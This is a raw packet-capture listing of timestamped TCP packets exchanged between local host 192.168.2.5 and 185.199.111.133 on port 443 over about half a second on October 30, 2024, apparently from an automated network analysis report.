                                                                                                                                                                              Oct 30, 2024 11:29:05.211127996 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.211142063 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.216643095 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.216660023 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.216732979 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.216747999 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.217308998 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.217323065 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.217370987 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.217382908 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.217411041 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.254774094 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.254786968 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.254869938 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.254884958 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255250931 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255264044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255321980 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.255335093 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255742073 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255754948 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255800962 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.255826950 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.255860090 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.256304026 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.256315947 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.256366968 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.256380081 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257091045 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257102966 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257153988 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.257167101 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257566929 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257580996 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257635117 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.257648945 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.257999897 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.258013010 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.258055925 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.258069038 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.258095980 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.286113977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286128044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286195040 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.286209106 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286678076 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286691904 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286736965 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.286756039 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.286777020 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.287112951 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287125111 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287169933 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.287182093 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287215948 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.287575960 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287587881 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287642002 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.287671089 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.287694931 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.302200079 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.302218914 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.302288055 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.302300930 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.302326918 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.329682112 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.329696894 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.329881907 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.329901934 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.335378885 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.335402012 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.335473061 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.335486889 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.336033106 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.336050987 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.336101055 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.336114883 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.336139917 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.373560905 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.373574972 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.373626947 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.373641014 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.373668909 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.374207973 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374219894 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374279976 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.374294043 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374587059 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374605894 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374644041 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.374655962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.374682903 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.375087023 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375099897 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375135899 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.375149012 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375176907 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.375632048 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375650883 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375688076 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.375706911 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.375730038 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.376132965 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376144886 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376220942 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.376235962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376581907 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376599073 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376636982 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.376648903 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376677036 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.376985073 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.376996994 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.377032995 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.377051115 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.377072096 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.405193090 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405220985 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405292988 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.405308008 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405644894 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405658960 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405698061 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.405709982 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.405741930 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.406183958 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.406202078 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.406240940 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.406254053 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.406281948 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.420602083 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.420617104 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.420664072 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.420676947 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.420702934 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.421087027 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.421104908 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.421143055 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.421154976 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.421180010 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.448755026 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.448771954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.448896885 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.448913097 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454447985 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454466105 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454514027 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.454526901 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454555035 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.454854012 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454866886 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.454917908 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.454931021 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492197990 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492223024 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492358923 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.492376089 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492640018 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492655039 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.492729902 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.492747068 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493411064 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493429899 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493495941 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.493510962 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493825912 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493839979 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.493904114 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.493917942 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.494663000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.494680882 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.494738102 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.494756937 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.494781971 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.495105982 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495119095 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495174885 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.495188951 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495558977 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495578051 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495621920 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.495640039 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495662928 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.495975018 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.495989084 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.496047974 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.496061087 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.523508072 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.523525000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.523699045 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.523711920 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524352074 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524365902 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524432898 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.524441004 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524868011 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524884939 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524928093 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.524935007 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.524969101 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.525259018 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.525271893 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.525316954 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.525324106 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.525348902 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.539752960 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.539771080 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.539901018 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.539907932 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.540270090 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.540282965 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.540343046 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.540349960 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.568702936 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.568727016 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.568892956 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.568929911 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573270082 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573282003 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573363066 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.573385000 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573860884 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573889971 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.573937893 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.573976994 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.574022055 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.611260891 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.611274004 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.611366987 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.611377954 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.611830950 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.611852884 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.611924887 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.611938953 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612278938 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612293005 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612349033 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.612356901 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612780094 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612799883 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612853050 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.612859964 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.612885952 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.613585949 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.613599062 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.613647938 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.613656044 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614144087 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614161015 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614197016 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.614202976 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614228964 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.614542961 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614556074 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614593983 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.614599943 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614626884 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.614883900 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614902020 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614934921 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.614940882 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.614973068 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.615276098 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.615289927 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.615329981 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.615338087 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.642910957 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.642929077 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.642981052 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.642990112 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.643517971 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.643531084 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.643563032 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.643569946 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.643588066 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.643974066 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.643990993 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.644027948 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.644033909 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.644058943 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.658363104 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658380032 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658559084 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.658569098 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658785105 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658803940 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658850908 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.658859015 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.658885956 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.686291933 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.686304092 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.686486959 CET49705443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:29:05.686495066 CET44349705185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:05.691622019 CET44349705185.199.111.133192.168.2.5
